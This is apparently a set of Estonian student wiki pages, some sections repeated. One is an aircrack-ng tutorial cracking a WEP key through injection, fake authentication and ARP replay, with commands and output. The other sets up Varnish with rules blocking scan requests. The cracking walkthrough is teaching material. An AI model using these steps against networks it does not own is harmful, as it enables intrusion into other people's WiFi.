2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

aircrack-ng on lihtne ja käepärane vahend, millega lahti murda ilma suurema vaevata WiFi-võrkude paroole. Õppe-eesmärgil on kindlasti vägagi asjakohane antud tööriistaga tutvust teha, sest üpris kiirelt saab selgeks, kuivõrd lihtne on tegelikult kellegi koduvõrku tungida manipuleerides andmepakettidega ja kasutades selleks vaid ~15 käsku.

=Kasutatud kirjandus=
<references />

=Autor=

Kelly Tragel [ISa 21] 
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
</table>

Aircrack

2015-05-26T08:57:14Z

Ktragel: /* Sissejuhatus */

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit, demonstreerides üht näitelahendust.

==Üldkirjeldus==

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm<ref>[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#description Description]</ref>. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu<ref>[https://web.archive.org/web/20120805024038/http://www.grape-info.com/doc/linux/config/aircrack-ng-0.6.html Aircrack-ng (WEP, WPA-PSK Crack)]</ref>:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine<ref>[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#usage Usage]</ref>:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine<ref>[https://wiki.debian.org/HowToIdentifyADevice/PCI PCI ]</ref>:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks<ref>[http://www.cyberciti.biz/faq/linux-list-network-cards-command/ HowTo: Linux Show List Of Network Cards]</ref>:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. </div>

=Üldkirjeldus=

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm<ref>[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#description Description]</ref>. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu<ref>[https://web.archive.org/web/20120805024038/http://www.grape-info.com/doc/linux/config/aircrack-ng-0.6.html Aircrack-ng (WEP, WPA-PSK Crack)]</ref>:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine<ref>[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#usage Usage]</ref>:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt<ref>[http://askubuntu.com/questions/294651/step-by-step-guide-to-install-aircrack-ng-suite-on-ubuntu-12-04-lts Step by Step guide to install aircrack-ng suite on ubuntu 12.04 LTS [duplicate]]</ref>:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]</ref>:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]</ref>.

==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview - the basic steps]</ref>: 
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]</ref> 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liides:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>
'''Märge:''' Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval ''airmon-ng stop athX'' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

'''Pane tähele!''' Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav ''airmon-ng stop ath0'' käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

'''Pane tähele!''' “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

'''Kontrolli:''' Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
 
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]</ref> 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:'' 
''-9 - “süstimise” test'' 
''-e teddy – raadiovõrgu nimi'' 
''-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress'' 
''ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

'''Pane tähele!''' Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
 
 
 
'''Samm 3: Avada airodump-ng pakettide püüdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:'' 
''-c 9 – raadiovõrgu kanal'' 
''--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda'' 
''-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>
 
 
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

''Selgitus:'' 
''-1 – võlts autentimine'' 
''0 – kordusühendus(t)e aeg sekundites'' 
''-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>

Ebaõnnestumise korral on tulemus:
<pre>8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
 
 
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode]</ref> 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>
 
 
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]</ref> 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
''-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub'' 
''output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

aircrack-ng on lihtne ja käepärane vahend, millega lahti murda ilma suurema vaevata WiFi-võrkude paroole. Õppe-eesmärgil on kindlasti vägagi asjakohane antud tööriistaga tutvust teha, sest üpris kiirelt saab selgeks, kuivõrd lihtne on tegelikult kellegi koduvõrku tungida manipuleerides andmepakettidega ja kasutades selleks vaid ~15 käsku.

=Kasutatud kirjandus=
<references />

=Autor=

Kelly Tragel [ISa 21] 
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
</table>

Varnish

2015-05-25T20:57:54Z

Ktragel: Tammsaare pisarad.

'''Varnish''' kasutatakse veebilehekülgede kiirendamiseks. Teenus installeeritakse HTTP serveri ette ning tehakse vastavad muutused sisu puhverdamiseks.

Varnish tavaliselt kiirendab andmete laadimist 300-1000 korda sõltuvalt veebilehe ülesehitusest. Varnish Cache hoiab veebilehti vahemälus kiirendades sellega javaskriptide ning piltide laadimist. Lisaks kasutatakse seda ka koormuse tasakaalustamiseks ning turvalisuse suurendamiseks.<ref>[https://www.varnish-cache.org/about About Varnish]</ref>

==Ajalugu==
Projekti algatas Norra suurim tabloidformaadis ajaleht Verdens Gang<ref>[https://www.varnish-software.com/use-case/vg-norway VG (Norway)| Varnish Software]</ref>. Arhitekt ja juhtiv arendaja on Taani konsultant Poul-Henning Kamp (tuntud kui FreeBSDcore arendaja).<ref>[https://www.varnish-cache.org/trac/wiki/ArchitectNotes Notes from the Architect]</ref> Varnish Cache tugi, haldus ja arendus koondus hiljem eraldi haruks - Varnish Software<ref>[https://www.varnish-software.com/about-us About Us | Varnish Software]</ref>.

Varnishi versioon 1.0 avalikustati aastal 2006<ref>[https://www.varnish-cache.org/lists/pipermail/varnish-announce/2006-September/000638.html Varnish 1.0 released]</ref>, Varnish 2.0 aastal 2008<ref>[https://www.varnish-cache.org/lists/pipermail/varnish-announce/2008-October/000010.html Varnish 2.0 released]</ref>, Varnish 3.0 aastal 2011<ref>[https://www.varnish-cache.org/lists/pipermail/varnish-announce/2011-June/000670.html Varnish 3.0.0 released]</ref> ja Varnish 4.0 aastal 2014<ref>[https://www.varnish-cache.org/lists/pipermail/varnish-announce/2014-April/000696.html Varnish 4.0.0 released]</ref>.

==Arhitektuur==
Varnish Cache salvestab andmed virtuaalmällu ja jätab otsustada, mis salvestatakse mällu ja mida suunatakse ketta operatsioonisüsteemi. See aitab vältida olukorda, kus operatsioonisüsteem hakkab andmeid suunama vahemällu samal ajal kui nad paigutatakse rakenduse poolt kettale.

Lisaks on Varnishi tugevalt "keermestatud", iga kliendi ühendust käsitletakse kui eraldi "keeret". Kui seadistatud aktiivsete "keerete" arv on täidetud, paigutatakse sisenevad ühendused ülevoolu järjekorda. Kui kui see järjekord jõuab teatud piirini, hakkab süsteem sissetulevaid ühendusi tagasi lükkama.

Peamine seadistamise mehhanism on VCL (Varnishi Configuration Language). Enamus kasutajapoliitika otsuseid jäetakse VCL koodi, mis muudab Varnishi palju rohkem seadistatavaks ja kohanemisvõimelisemaks kui enamik teisi HTTP kiirendeid. Kui VLC skript on laetud, tõlgitakse see "C" keelde, kompileeritakse, et jagada objektid süsteemi poolt kompilaatorisse ja seotakse otse kiirendiga.

Arvu run-time parameetrid kontrollivad näiteks maksimaalset ja minimaalset aktiivsete keerete arvu, nende erinevaid süsteemipause jne. Käsurea juhtimise liides võimaldab neid parameetreid muuta, uusi VCL skripte kompileerida, laadida ja aktiveerida kiirendile taaskäivitust tegemata.

Selleks, et vähendada süsteemi päringute arvu kiirelt miinimumini, on logi-andmed salvestatud mällu ning logi-andmete filtreerimine, vorminine ning kirjutamine aktiivsele kettale kettale.<ref>[https://en.wikipedia.org/wiki/Varnish_%28software%29#Architecture Varnish(software) Wikipedia]</ref>

==Varnishi paigaldamine turvalisuse suurendamiseks==
<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Hoiatus: '''Antud installatsiooni lahendus on testitud Ubuntu 14.04.2 LTS peal, kuid võib toimida muudel Debianil baseeruvate distributsioonide peal. Muude distributsioonide peal paigaldamiseks tasub uurida arendaja kodulehekülge<ref>[https://www.varnish-cache.org/releases Varnish Releases]</ref>.

Eelduseks on töötav veebileht, näiteks [[Veebiserveri_labor|Apache]] vaikeleht või WordPressi leht. Kui seda tehtud pole, siis seda kirjeldab [[WordPress_turvamine|WordPress turvamise labor]].</div>
Järgneva juhendi<ref>[https://www.howtoforge.com/putting-varnish-in-front-of-apache-on-ubuntu-debian Putting Varnish In Front Of Apache On Ubuntu/Debian]</ref> abil on võimalik sättida Varnish ülesse nii, et mitte-täielikud HTTP päringud püütakse kinni Varnishi teenuse poolt. Esialgne juhend on kohandatud uuema Varnishi versiooni ja Ubuntu väljalaske jaoks.

===Apache konfigureerimine===
Apache2 tuleb kuulama panna localhosti, selleks on vaja <code>/etc/apache2/ports.conf</code> konfiguratsioonifailis muuta vaikimisi kuulatav port 80 pealt 8080 peale.

Listen 8080

Järgmisena tuleb muuta virtualhosti failis olev kuulatav port.
Siin näites kasutame Apache2 vaikelehe konfiguratsioonifaili <code>/etc/apache2/sites-available/000-default.conf</code>, kus tuleb muuta vaikimisi kuulatav port 80 meile vajalikuks port 8080 peale. Seda saab teha manuaalselt tekstiredaktoriga, kuid kui on vaja mitu faili muuta, siis on mõtekas kasutusele võtta käsurea utiliit [[sed]]

cd /etc/apache2/sites-available
sed 's/:80/:8080/' 000-default.conf -i

Hetkeseisuga on konfiguratsioon selline, et Varnish saab kirjeid Apachelt ja külastajate IP addressiks logitakse lokaalse masina IP.
Selle parandamiseks paigaldame Apachele lisamooduli, et kuvataks kliendi õige ip aadress:

apt-get install libapache2-mod-rpaf

===Varnish Paigaldus===
Kuna Varnishi repositoorium<ref>[https://www.varnish-cache.org/installation/ubuntu Installation on Ubuntu]</ref> on turvalisel http kanalil, siis on vaja laiendada apt utiliiti, et see oleks võimeline tõlgendama https:// aadresse, kui vastav laiendus pole paigaldatud, siis saab selle Ubuntus installeerida järgnevalt:

apt-get install apt-transport-https

Lisame Varnishi repositooriumi krüptovõtme, et apt oleks suuteline autentima repositooriumist alla laetavaid faile:

curl <nowiki>https://repo.varnish-cache.org/GPG-key.txt</nowiki> | apt-key add -

Lisame Varnishi repositooriumi Ubuntu 14.04 Trusty Tahr jaoks oma apt utiliidi allikate loendisse:

echo "deb <nowiki>https://repo.varnish-cache.org/ubuntu/ trusty varnish-4.0</nowiki>" >> /etc/apt/sources.list.d/varnish-cache.list

Uuendame repositooriumi ja paigaldame Varnishi:

apt-get update && apt-get install varnish

===Varnishi konfiguratsiooni muutmine===
Muudame Varnishi konfiguratsioonifaili <code>/etc/default/varnish</code>, et Varnish kuulaks vaikimisi port 80 ja muudame VCL faili asukohta. Siin näites on kasutusele võetud <code>/etc/varnish/meieleht.vcl</code>:
<pre>
DAEMON_OPTS="-a :80 \
-T localhost:6082 \
-f /etc/varnish/meieleht.vcl \
-S /etc/varnish/secret \
-s malloc,256m"
</pre>
Kopeerime vcl struktuuri vaikefailist <code>default.vcl</code> uude faili <code>meieleht.vcl</code>:

cp /etc/varnish/default.vcl /etc/varnish/meieleht.vcl

Täiendame faili <code>meieleht.vcl</code>, et tõsta Apache turvalisust Varnishi abiga.
<div style="padding: 5px; margin: 0.50em 0; background-color: #DDDDFF; border: thin solid #BBBBDD; overflow: hidden;">'''Märge: '''Esialgne juhend kasutas Varnish 2.1, mille süntaks erineb natukene Varnish 4.0.3 omast. <ref>[https://www.varnish-cache.org/docs/trunk/whats-new/upgrade-4.0.html Süntaksi muudatused versioon Varnish 4.0 versioonis]</ref></div>
<pre>
sub vcl_recv {
# Add a unique header containing the client address.
unset req.http.X-Forwarded-For;
set req.http.X-Forwarded-For = client.ip;
# Added security, the "w00tw00t" attacks are pretty annoying so let's block
# it before it reaches our webserver.
if (req.url ~ "^/w00tw00t") {
return (synth(403, "Not permitted"));
}
}

sub vcl_backend_response {
# Remove the X-Forwarded-For header if it exists.
unset bereq.http.X-Forwarded-For;

# Insert the client IP address as X-Forwarded-For.
# This is the normal IP address of the user.
set bereq.http.X-Forwarded-For = bereq.http.rlnclientipaddr;

# Deliver the content
return (deliver);
}

sub vcl_deliver {
# We'll be hiding some headers added by Varnish. We want to make sure people
# are not seeing that we are using Varnish.
# Since we're not caching (yet), why bother telling people we are using it?
unset resp.http.X-Varnish;
unset resp.http.Via;
unset resp.http.Age;
# We'd like to hide the X-Powered-By headers. Nobody has to know we can run
# PHP and have version XYZ of it.
unset resp.http.X-Powered-By;
}
</pre>

===Deemonite restart===
Kõigepealt tuleb taaskäivitada Apache teenus:

service apache2 restart

Järgnevalt kontrollime netstat utiliidiga, kas Apache kuulab meie poolt konfigureeritud porti:

netstat -lp | grep apache2

Tulemus peab olema taoline:

tcp 0 0 localhost:8080 *:* LISTEN 4586/apache2

Taaskäivitame Varnishi teenuse:

service varnish restart

Kontrollime, kas Varnishi teenus kuulab õigelt pordilt:

netstat -lp | grep varnish

Tulemus peab olema taoline:

tcp 0 0 *:www *:* LISTEN 4498/varnishd
tcp6 0 0 [::]:www [::]:* LISTEN 4498/varnishd

Varnish on ka võimeline kuulama pealt ipv6.

Nüüd on Varnish paigaldatud Apache2 ette ja sait peab nüüd töötama. Kui Apache2 peatada, kuvatakse Varnish veateate lehekülg.

==Logimine==
Veebilehe külastamisi saab jälgida <code>/var/log/varnish/access.log</code> logifailist.
===Detailsemate logide konfigureerimine===
<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Hoiatus: '''Järgnev sektsioon on vabatahtlik. Kui oled siiani järginud juhendit siis on sul Apache2+Varnish konfigureeritud ja toimiv ning edasi pole vaja konfigureerida aine IT Infrastruktuuride raames.</div>
Vaikimisi kuvatakse Apache logides serveri aadressi asemel kliendi addres. Kuna kliendi asemel suhtleb Apache veebiserveriga Varnish, mis on lokaalse masina peal siis see tähendab, et logifailides kuvatakse iga kirje puhul serveri enda aadressi.
<ref>[http://willjackson.org/blog/configure-vanish-forward-client-ip-addresses-apache-logs Configure Varnish to forward client ip addresses in Apache logs]</ref>


====VCL faili reeglid====
Lisada oma Varnish konfiguratsiooni .vcl read:
Näiteks failis <code>/etc/varnish/meieleht.vcl</code>
<pre>
sub vcl_recv {
# Rename the incoming XFF header to work around a Varnish bug.
if (req.http.X-Forwarded-For) {
# Append the client IP
set req.http.X-Real-Forwarded-For = req.http.X-Forwarded-For ", " regsub(client.ip, ":.*", "");
unset req.http.X-Forwarded-For;
} else {
# Simply use the client IP
set req.http.X-Real-Forwarded-For = regsub(client.ip, ":.*", "");
}
}
</pre>

====Apache pool====
Konfigureerime Apache uut logimisformaati kasutama käsklusega, mis loob faili <code>varnish-log</code>.

echo 'LogFormat "%{X-Forwarded-For}i %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" varnishcombined' > /etc/apache2/conf.d/varnish-log

Samuti tuleb iga virtualhosti (nt. <code>000-default.conf</code>) logiformaadi rea puhul ülesse leida sõna <code>combined</code> ja asendada see sõnaga <code>varnishcombined</code>, selleks kasutame jällegi utiliiti sed:

cd /etc/apache2/sites-available/
sed 's/combined/varnishcombined/' 000-default.conf -i

Vahepealseks etapiks on teenuste taaskäivitamine:

service apache2 restart && service varnish restart

Siis tuleb virtualhostid välja ja sisse lülitada:

a2dissite 000-default.conf n2ide.conf n2ide3.conf
a2ensite 000-default.conf n2ide.conf n2ide3.conf

====Tulemuse kontroll====
Ühenda kliendiga veebiserveri külge ja vaata Apache2 <code>access.log</code> faili, mis ip logitakse kui külastada veebilehte.

tail /var/log/apache2/access.log

==Security.VCL paigaldamine==
<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Hoiatus: '''Järgnev sektsioon on vabatahtlik. Kui oled siiani järginud juhendit siis on sul Apache2+Varnish konfigureeritud ja toimiv ning edasi pole vaja konfigureerida aine IT Infrastruktuuride raames.</div>
Security.vcl on Web Application tulemüür, mis on rakendatud vcl(Varnish Control Language) keeles.<ref>[https://github.com/comotion/security.vcl/blob/master/README Security.vcl README]</ref>

Oma funktsiooni poolest sarnaneb [[mod_security]]le, aga on rakendatud teistmoodi.

Esimese sammuna tuleks paigaldada vajalikud utiliidid kompileerimiseks:

apt-get install git make

Siis tuleks kloonida [[git]]i repositooriumis olev algmaterjal:

git clone <nowiki>https://github.com/comotion/security.vcl.git</nowiki>

Järgmiste sammudena on vaja repositooriumis olev rakendus paigaldada ja luua sümboolne link Varnishi konfiguratsiooni kausta:

cd security.vcl/vcl/
sudo make
cd ..
sudo ln -s $PWD/vcl/ /etc/varnish/security

Lisa Varnishi .vcl conf faili järgnev rida <code>backend default</code> koodiploki alla:

include "/etc/varnish/security/main.vcl";

Välja peaks nägema nii:
<pre>
backend default {
.host = "127.0.0.1";
.port = "8080";
}

include "/etc/varnish/security/main.vcl";

</pre>

Taaskäivita Varnishi teenus:

service varnish restart

===Tulemuse kontroll===
Proovi nüüd minna enda veebiserveri külge aadressiga:
<nowiki>http://<sinu serveri ip>/javascript:</nowiki>
Kui kõik toimib, tuleb vastuseks:
Error 403 Naughty, not nice!

==Kokkuvõte==
